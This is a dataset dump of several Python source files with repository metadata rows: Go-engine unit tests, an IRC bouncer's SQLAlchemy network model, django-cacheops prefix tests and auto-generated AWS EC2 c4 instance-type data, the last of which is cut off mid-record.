        self.assertEqual(sole_group.liberties, parse_kgs_coords_set('C9 A8 B8'))
        self.assertEqual(sole_group.color, BLACK)

    def test_place_stone_opposite_color(self):
        """An adjacent opposite-color stone forms a second group and reduces
        the first group's liberties."""
        board = test_utils.load_board('X........' + EMPTY_ROW * 8)
        lib_tracker = LibertyTracker.from_board(board)
        lib_tracker.add_stone(WHITE, parse_kgs_coords('B9'))
        self.assertEqual(len(lib_tracker.groups), 2)
        self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('A9')], go.MISSING_GROUP_ID)
        self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('B9')], go.MISSING_GROUP_ID)
        self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('A9')], 1)
        self.assertEqual(lib_tracker.liberty_cache[parse_kgs_coords('B9')], 2)
        black_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
        white_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B9')]]
        self.assertEqual(black_group.stones, parse_kgs_coords_set('A9'))
        self.assertEqual(black_group.liberties, parse_kgs_coords_set('A8'))
        self.assertEqual(black_group.color, BLACK)
        self.assertEqual(white_group.stones, parse_kgs_coords_set('B9'))
        self.assertEqual(white_group.liberties, parse_kgs_coords_set('C9 B8'))
        self.assertEqual(white_group.color, WHITE)

    def test_merge_multiple_groups(self):
        """A stone touching several friendly groups merges them all into one;
        the liberty cache is updated for every merged stone."""
        board = test_utils.load_board('''
            .X.......
            X.X......
            .X.......
        ''' + EMPTY_ROW * 6)
        lib_tracker = LibertyTracker.from_board(board)
        lib_tracker.add_stone(BLACK, parse_kgs_coords('B8'))
        self.assertEqual(len(lib_tracker.groups), 1)
        self.assertNotEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
        sole_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B8')]]
        self.assertEqual(sole_group.stones, parse_kgs_coords_set('B9 A8 B8 C8 B7'))
        self.assertEqual(sole_group.liberties, parse_kgs_coords_set('A9 C9 D8 A7 C7 B6'))
        self.assertEqual(sole_group.color, BLACK)
        liberty_cache = lib_tracker.liberty_cache
        for stone in sole_group.stones:
            self.assertEqual(liberty_cache[stone], 6, str(stone))

    def test_capture_stone(self):
        """Filling a surrounded stone's last liberty removes its group."""
        board = test_utils.load_board('''
            .X.......
            XO.......
            .X.......
        ''' + EMPTY_ROW * 6)
        lib_tracker = LibertyTracker.from_board(board)
        captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('C8'))
        self.assertEqual(len(lib_tracker.groups), 4)
        self.assertEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
        self.assertEqual(captured, parse_kgs_coords_set('B8'))

    def test_capture_many(self):
        """Capturing a two-stone group frees its points as liberties for all
        four surrounding groups; the liberty cache reflects the capture."""
        board = test_utils.load_board('''
            .XX......
            XOO......
            .XX......
        ''' + EMPTY_ROW * 6)
        lib_tracker = LibertyTracker.from_board(board)
        captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('D8'))
        self.assertEqual(len(lib_tracker.groups), 4)
        self.assertEqual(lib_tracker.group_index[parse_kgs_coords('B8')], go.MISSING_GROUP_ID)
        self.assertEqual(captured, parse_kgs_coords_set('B8 C8'))
        left_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A8')]]
        self.assertEqual(left_group.stones, parse_kgs_coords_set('A8'))
        self.assertEqual(left_group.liberties, parse_kgs_coords_set('A9 B8 A7'))
        right_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('D8')]]
        self.assertEqual(right_group.stones, parse_kgs_coords_set('D8'))
        self.assertEqual(right_group.liberties, parse_kgs_coords_set('D9 C8 E8 D7'))
        top_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B9')]]
        self.assertEqual(top_group.stones, parse_kgs_coords_set('B9 C9'))
        self.assertEqual(top_group.liberties, parse_kgs_coords_set('A9 D9 B8 C8'))
        bottom_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B7')]]
        self.assertEqual(bottom_group.stones, parse_kgs_coords_set('B7 C7'))
        self.assertEqual(bottom_group.liberties, parse_kgs_coords_set('B8 C8 A7 D7 B6 C6'))
        liberty_cache = lib_tracker.liberty_cache
        for stone in top_group.stones:
            self.assertEqual(liberty_cache[stone], 4, str(stone))
        for stone in left_group.stones:
            self.assertEqual(liberty_cache[stone], 3, str(stone))
        for stone in right_group.stones:
            self.assertEqual(liberty_cache[stone], 4, str(stone))
        for stone in bottom_group.stones:
            self.assertEqual(liberty_cache[stone], 6, str(stone))
        for stone in captured:
            self.assertEqual(liberty_cache[stone], 0, str(stone))

    def test_capture_multiple_groups(self):
        """One move can capture several distinct enemy groups at once (corner
        snapback shape)."""
        board = test_utils.load_board('''
            .OX......
            OXX......
            XX.......
        ''' + EMPTY_ROW * 6)
        lib_tracker = LibertyTracker.from_board(board)
        captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('A9'))
        self.assertEqual(len(lib_tracker.groups), 2)
        self.assertEqual(captured, parse_kgs_coords_set('B9 A8'))
        corner_stone = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
        self.assertEqual(corner_stone.stones, parse_kgs_coords_set('A9'))
        self.assertEqual(corner_stone.liberties, parse_kgs_coords_set('B9 A8'))
        surrounding_stones = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('C9')]]
        self.assertEqual(surrounding_stones.stones, parse_kgs_coords_set('C9 B8 C8 A7 B7'))
        self.assertEqual(surrounding_stones.liberties, parse_kgs_coords_set('B9 D9 A8 D8 C7 A6 B6'))
        liberty_cache = lib_tracker.liberty_cache
        for stone in corner_stone.stones:
            self.assertEqual(liberty_cache[stone], 2, str(stone))
        for stone in surrounding_stones.stones:
            self.assertEqual(liberty_cache[stone], 7, str(stone))

    def test_same_friendly_group_neighboring_twice(self):
        """A stone touching the same friendly group on two sides must not
        double-count it; the result is a single merged group."""
        board = test_utils.load_board('''
            XX.......
            X........
        ''' + EMPTY_ROW * 7)
        lib_tracker = LibertyTracker.from_board(board)
        captured = lib_tracker.add_stone(BLACK, parse_kgs_coords('B8'))
        self.assertEqual(len(lib_tracker.groups), 1)
        sole_group_id = lib_tracker.group_index[parse_kgs_coords('A9')]
        sole_group = lib_tracker.groups[sole_group_id]
        self.assertEqual(sole_group.stones, parse_kgs_coords_set('A9 B9 A8 B8'))
        self.assertEqual(sole_group.liberties, parse_kgs_coords_set('C9 C8 A7 B7'))
        self.assertEqual(captured, set())

    def test_same_opponent_group_neighboring_twice(self):
        """A stone touching the same enemy group on two sides removes only one
        liberty per shared point, not one per contact."""
        board = test_utils.load_board('''
            XX.......
            X........
        ''' + EMPTY_ROW * 7)
        lib_tracker = LibertyTracker.from_board(board)
        captured = lib_tracker.add_stone(WHITE, parse_kgs_coords('B8'))
        self.assertEqual(len(lib_tracker.groups), 2)
        black_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('A9')]]
        self.assertEqual(black_group.stones, parse_kgs_coords_set('A9 B9 A8'))
        self.assertEqual(black_group.liberties, parse_kgs_coords_set('C9 A7'))
        white_group = lib_tracker.groups[lib_tracker.group_index[parse_kgs_coords('B8')]]
        self.assertEqual(white_group.stones, parse_kgs_coords_set('B8'))
        self.assertEqual(white_group.liberties, parse_kgs_coords_set('C8 B7'))
        self.assertEqual(captured, set())
class TestPosition(test_utils.MiniGoUnitTest):
    """Tests for Position: passing, legality, captures, ko, scoring, replay."""

    def test_passing(self):
        """A pass advances the move counter, clears ko and flips to_play."""
        start_position = Position(
            board=TEST_BOARD,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=parse_kgs_coords('A1'),
            recent=tuple(),
            to_play=BLACK,
        )
        expected_position = Position(
            board=TEST_BOARD,
            n=1,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=(PlayerMove(BLACK, None),),
            to_play=WHITE,
        )
        pass_position = start_position.pass_move()
        self.assertEqualPositions(pass_position, expected_position)

    def test_flipturn(self):
        """flip_playerturn swaps to_play and clears ko without recording a move."""
        start_position = Position(
            board=TEST_BOARD,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=parse_kgs_coords('A1'),
            recent=tuple(),
            to_play=BLACK,
        )
        expected_position = Position(
            board=TEST_BOARD,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=tuple(),
            to_play=WHITE,
        )
        flip_position = start_position.flip_playerturn()
        self.assertEqualPositions(flip_position, expected_position)

    def test_is_move_suicidal(self):
        """Moves that leave their own group with no liberties are suicidal."""
        board = test_utils.load_board('''
            ...O.O...
            ....O....
            XO.....O.
            OXO...OXO
            O.XO.OX.O
            OXO...OOX
            XO.......
            ......XXO
            .....XOO.
        ''')
        position = Position(
            board=board,
            to_play=BLACK,
        )
        suicidal_moves = parse_kgs_coords_set('E9 H5')
        nonsuicidal_moves = parse_kgs_coords_set('B5 J1 A9')
        for move in suicidal_moves:
            assert(position.board[move] == go.EMPTY) #sanity check my coordinate input
            self.assertTrue(position.is_move_suicidal(move), str(move))
        for move in nonsuicidal_moves:
            assert(position.board[move] == go.EMPTY) #sanity check my coordinate input
            self.assertFalse(position.is_move_suicidal(move), str(move))

    def test_legal_moves(self):
        """Per-move legality agrees with the bulk all_legal_moves() array, for
        both colors (the position is color-flipped and re-checked)."""
        board = test_utils.load_board('''
            .O.O.XOX.
            O..OOOOOX
            ......O.O
            OO.....OX
            XO.....X.
            .O.......
            OX.....OO
            XX...OOOX
            .....O.X.
        ''')
        position = Position(board=board, to_play=BLACK)
        illegal_moves = parse_kgs_coords_set('A9 E9 J9')
        legal_moves = parse_kgs_coords_set('A4 G1 J1 H7') | {None}
        for move in illegal_moves:
            with self.subTest(type='illegal', move=move):
                self.assertFalse(position.is_move_legal(move))
        for move in legal_moves:
            with self.subTest(type='legal', move=move):
                self.assertTrue(position.is_move_legal(move))
        # check that the bulk legal test agrees with move-by-move illegal test.
        bulk_legality = position.all_legal_moves()
        for i, bulk_legal in enumerate(bulk_legality):
            with self.subTest(type='bulk', move=unflatten_coords(i)):
                self.assertEqual(bulk_legal, position.is_move_legal(unflatten_coords(i)))
        # flip the colors and check that everything is still (il)legal
        position = Position(board=-board, to_play=WHITE)
        for move in illegal_moves:
            with self.subTest(type='illegal', move=move):
                self.assertFalse(position.is_move_legal(move))
        for move in legal_moves:
            with self.subTest(type='legal', move=move):
                self.assertTrue(position.is_move_legal(move))
        bulk_legality = position.all_legal_moves()
        for i, bulk_legal in enumerate(bulk_legality):
            with self.subTest(type='bulk', move=unflatten_coords(i)):
                self.assertEqual(bulk_legal, position.is_move_legal(unflatten_coords(i)))

    def test_move(self):
        """play_move places a stone, bumps n, records the move and flips turn;
        two consecutive moves accumulate in `recent`."""
        start_position = Position(
            board=TEST_BOARD,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=tuple(),
            to_play=BLACK,
        )
        expected_board = test_utils.load_board('''
            .XX....OO
            X........
        ''' + EMPTY_ROW * 7)
        expected_position = Position(
            board=expected_board,
            n=1,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=(PlayerMove(BLACK, parse_kgs_coords('C9')),),
            to_play=WHITE,
        )
        actual_position = start_position.play_move(parse_kgs_coords('C9'))
        self.assertEqualPositions(actual_position, expected_position)
        expected_board2 = test_utils.load_board('''
            .XX....OO
            X.......O
        ''' + EMPTY_ROW * 7)
        expected_position2 = Position(
            board=expected_board2,
            n=2,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=(PlayerMove(BLACK, parse_kgs_coords('C9')), PlayerMove(WHITE, parse_kgs_coords('J8'))),
            to_play=BLACK,
        )
        actual_position2 = actual_position.play_move(parse_kgs_coords('J8'))
        self.assertEqualPositions(actual_position2, expected_position2)

    def test_move_with_capture(self):
        """A capturing move removes the dead stones and credits the captures."""
        start_board = test_utils.load_board(EMPTY_ROW * 5 + '''
            XXXX.....
            XOOX.....
            O.OX.....
            OOXX.....
        ''')
        start_position = Position(
            board=start_board,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=tuple(),
            to_play=BLACK,
        )
        expected_board = test_utils.load_board(EMPTY_ROW * 5 + '''
            XXXX.....
            X..X.....
            .X.X.....
            ..XX.....
        ''')
        expected_position = Position(
            board=expected_board,
            n=1,
            komi=6.5,
            caps=(7, 2),
            ko=None,
            recent=(PlayerMove(BLACK, parse_kgs_coords('B2')),),
            to_play=WHITE,
        )
        actual_position = start_position.play_move(parse_kgs_coords('B2'))
        self.assertEqualPositions(actual_position, expected_position)

    def test_ko_move(self):
        """A single-stone capture sets the ko point; immediate recapture is
        illegal, but becomes legal after two intervening (pass) moves."""
        start_board = test_utils.load_board('''
            .OX......
            OX.......
        ''' + EMPTY_ROW * 7)
        start_position = Position(
            board=start_board,
            n=0,
            komi=6.5,
            caps=(1, 2),
            ko=None,
            recent=tuple(),
            to_play=BLACK,
        )
        expected_board = test_utils.load_board('''
            X.X......
            OX.......
        ''' + EMPTY_ROW * 7)
        expected_position = Position(
            board=expected_board,
            n=1,
            komi=6.5,
            caps=(2, 2),
            ko=parse_kgs_coords('B9'),
            recent=(PlayerMove(BLACK, parse_kgs_coords('A9')),),
            to_play=WHITE,
        )
        actual_position = start_position.play_move(parse_kgs_coords('A9'))
        self.assertEqualPositions(actual_position, expected_position)
        # Check that retaking ko is illegal until two intervening moves
        with self.assertRaises(go.IllegalMove):
            actual_position.play_move(parse_kgs_coords('B9'))
        pass_twice = actual_position.pass_move().pass_move()
        ko_delayed_retake = pass_twice.play_move(parse_kgs_coords('B9'))
        expected_position = Position(
            board=start_board,
            n=4,
            komi=6.5,
            caps=(2, 3),
            ko=parse_kgs_coords('A9'),
            recent=(
                PlayerMove(BLACK, parse_kgs_coords('A9')),
                PlayerMove(WHITE, None),
                PlayerMove(BLACK, None),
                PlayerMove(WHITE, parse_kgs_coords('B9'))),
            to_play=BLACK,
        )
        self.assertEqualPositions(ko_delayed_retake, expected_position)

    def test_is_game_over(self):
        """The game ends after two consecutive passes."""
        root = go.Position()
        self.assertFalse(root.is_game_over())
        first_pass = root.play_move(None)
        self.assertFalse(first_pass.is_game_over())
        second_pass = first_pass.play_move(None)
        self.assertTrue(second_pass.is_game_over())

    def test_scoring(self):
        """Area scoring (minus komi) yields the expected margins on two
        nearly finished boards; adding one black stone shifts the score."""
        board = test_utils.load_board('''
            .XX......
            OOXX.....
            OOOX...X.
            OXX......
            OOXXXXXX.
            OOOXOXOXX
            .O.OOXOOX
            .O.O.OOXX
            ......OOO
        ''')
        position = Position(
            board=board,
            n=54,
            komi=6.5,
            caps=(2, 5),
            ko=None,
            recent=tuple(),
            to_play=BLACK,
        )
        expected_score = 1.5
        self.assertEqual(position.score(), expected_score)
        board = test_utils.load_board('''
            XXX......
            OOXX.....
            OOOX...X.
            OXX......
            OOXXXXXX.
            OOOXOXOXX
            .O.OOXOOX
            .O.O.OOXX
            ......OOO
        ''')
        position = Position(
            board=board,
            n=55,
            komi=6.5,
            caps=(2, 5),
            ko=None,
            recent=tuple(),
            to_play=WHITE,
        )
        expected_score = 2.5
        self.assertEqual(position.score(), expected_score)

    def test_replay_position(self):
        """Replaying a full SGF and then replaying the resulting Position
        reproduces the same sequence of intermediate positions."""
        sgf_positions = list(sgf_wrapper.replay_sgf(NO_HANDICAP_SGF))
        initial = sgf_positions[0]
        self.assertEqual(initial.result, go.WHITE)
        final = sgf_positions[-1].position.play_move(sgf_positions[-1].next_move)
        # sanity check to ensure we're working with the right position
        final_board = test_utils.load_board('''
            .OXX.....
            O.OX.X...
            .OOX.....
            OOOOXXXXX
            XOXXOXOOO
            XOOXOO.O.
            XOXXXOOXO
            XXX.XOXXO
            X..XOO.O.
        ''')
        expected_final_position = go.Position(
            final_board,
            n=62,
            komi=6.5,
            caps=(3, 2),
            ko=None,
            recent=tuple(),
            to_play=go.BLACK
        )
        self.assertEqualPositions(expected_final_position, final)
        self.assertEqual(final.n, len(final.recent))
        replayed_positions = list(go.replay_position(final))
        for sgf_pos, replay_pos in zip(sgf_positions, replayed_positions):
            self.assertEqualPositions(sgf_pos.position, replay_pos.position)
| 39.939551 | 469 | 0.597881 |
79554cbcd92e1d5bd8be4987e8f7c8ac4cba51f8 | 73 | py | Python | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 11 | 2021-09-01T23:10:51.000Z | 2022-03-20T07:39:37.000Z | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 22 | 2021-05-18T14:10:27.000Z | 2021-10-04T15:06:27.000Z | oremda/messengers/base/__init__.py | cclauss/oremda | b04e58fbb8c9c08a928f876ae1358462f3ef311d | [
"BSD-3-Clause"
] | 2 | 2021-09-01T22:11:13.000Z | 2021-10-30T09:12:36.000Z | from .messenger import BaseMessenger
__all__ = [
"BaseMessenger",
]
| 12.166667 | 36 | 0.712329 |
79554d6e35f85330788798c8a78b79e7c9e2182b | 3,298 | py | Python | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 54 | 2015-07-06T10:03:43.000Z | 2020-12-27T06:08:02.000Z | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 68 | 2015-11-22T13:56:59.000Z | 2019-01-24T18:19:28.000Z | ircb/models/network.py | waartaa/pyirc | 18381b167529ee56d1c5d5d22f857bb27692c397 | [
"MIT"
] | 15 | 2015-08-13T04:41:31.000Z | 2021-09-30T20:01:38.000Z | # -*- coding: utf-8 -*-
import datetime
from hashlib import md5
import sqlalchemy as sa
from sqlalchemy_utils import ChoiceType, Choice
from ircb.models.lib import Base, get_session
from ircb.models.user import User
from ircb.config import settings
NETWORK_STATUS_TYPES = (
('0', 'Connecting'),
('1', 'Connected'),
('2', 'Disconnecting'),
('3', 'Disconnected')
)
SSL_VERIFY_CHOICES = (
('CERT_NONE', 'No certs required'),
('CERT_OPTIONAL', 'Optional cert'),
('CERT_REQUIRED', 'Cert required')
)
session = get_session()
def _create_access_token(user_id, network_name):
user = session.query(User).get(user_id)
return md5('{}{}{}{}'.format(settings.SECRET_KEY,
user.username,
network_name,
datetime.datetime.utcnow()).encode()
).hexdigest()
class Network(Base):
__tablename__ = 'networks'
__table_args__ = (
sa.UniqueConstraint('user_id', 'name'),
)
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String(255), nullable=False)
nickname = sa.Column(sa.String(20), nullable=False)
hostname = sa.Column(sa.String(100), nullable=False)
port = sa.Column(sa.Integer, nullable=False)
realname = sa.Column(sa.String(100), nullable=False, default='')
username = sa.Column(sa.String(50), nullable=False, default='')
password = sa.Column(sa.String(100), nullable=False, default='')
usermode = sa.Column(sa.String(1), nullable=False, default='0')
ssl = sa.Column(sa.Boolean(), default=False)
ssl_verify = sa.Column(ChoiceType(SSL_VERIFY_CHOICES),
default=Choice(*SSL_VERIFY_CHOICES[0]))
access_token = sa.Column(sa.String(100), nullable=False, unique=True,
default=lambda context: _create_access_token(
context.current_parameters['user_id'],
context.current_parameters['name']))
user_id = sa.Column(
sa.Integer(), sa.ForeignKey(User.id, ondelete='CASCADE'),
nullable=False)
# Runtime fields
current_nickname = sa.Column(sa.String(20), nullable=True)
status = sa.Column(ChoiceType(NETWORK_STATUS_TYPES),
default=Choice(*NETWORK_STATUS_TYPES[3]))
# Remote socket info
rhost = sa.Column(sa.String(100), nullable=True)
rport = sa.Column(sa.Integer(), nullable=True)
# Local socket info
lhost = sa.Column(sa.String(100), nullable=True)
lport = sa.Column(sa.Integer(), nullable=True)
# timestamps
created = sa.Column(sa.DateTime, default=datetime.datetime.utcnow)
last_updated = sa.Column(sa.DateTime,
default=datetime.datetime.utcnow)
def create_access_token(self):
return _create_access_token(self.user.id, self.name)
def to_dict(self, serializable=False):
d = super().to_dict()
ssl_verify = self.ssl_verify and self.ssl_verify if isinstance(
self.ssl_verify, str) else self.ssl_verify.code
status = self.status and (
self.status if isinstance(self.status, str) else self.status.code)
d['ssl_verify'] = ssl_verify
d['status'] = status
return d
| 35.462366 | 78 | 0.630079 |
79554de7aa7b1bc0da0087917eb588b16d591284 | 2,197 | py | Python | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | tests/cluster/tests_sharding.py | ParcelPerform/django-cacheops | 031c0a206fbafb304cda9302b9ebe33829383ddd | [
"BSD-3-Clause"
] | null | null | null | from django.core.exceptions import ImproperlyConfigured
from django.test import override_settings
from cacheops import cache, CacheMiss
from tests.models import Category, Post, Extra
from tests.utils import BaseTestCase
from cacheops.cluster.prefix_validator import InvalidPrefix
class PrefixTests(BaseTestCase):
databases = ('default', 'slave')
fixtures = ['basic']
def test_context(self):
prefix = ['']
with override_settings(CACHEOPS_PREFIX=lambda _: prefix[0]):
with self.assertNumQueries(2):
Category.objects.cache().count()
prefix[0] = 'x'
Category.objects.cache().count()
@override_settings(CACHEOPS_PREFIX=lambda q: q.db)
def test_db(self):
with self.assertNumQueries(1):
list(Category.objects.cache())
with self.assertNumQueries(1, using='slave'):
list(Category.objects.cache().using('slave'))
list(Category.objects.cache().using('slave'))
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_table(self):
self.assertTrue(Category.objects.all()._cache_key().startswith('tests_category'))
with self.assertRaises(ImproperlyConfigured):
list(Post.objects.filter(category__title='Django').cache())
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_self_join_tables(self):
list(Extra.objects.filter(to_tag__pk=1).cache())
@override_settings(CACHEOPS_PREFIX=lambda q: q.table)
def test_union_tables(self):
qs = Post.objects.filter(pk=1).union(Post.objects.filter(pk=2)).cache()
list(qs)
@override_settings(CACHEOPS_PREFIX=lambda q: f"{{{q.table}}}")
def test_union_tables(self):
with self.assertRaises(InvalidPrefix):
qs = Post.objects.filter(pk=1).union(Post.objects.filter(pk=2)).cache()
list(qs)
class SimpleCacheTests(BaseTestCase):
def test_prefix(self):
with override_settings(CACHEOPS_PREFIX=lambda _: 'a'):
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
with self.assertRaises(CacheMiss):
cache.get("key")
| 35.435484 | 89 | 0.667729 |
79554e3e7b260682160d5e1d80cd252b7466fc26 | 7,903 | py | Python | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c4.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 
'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 
'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 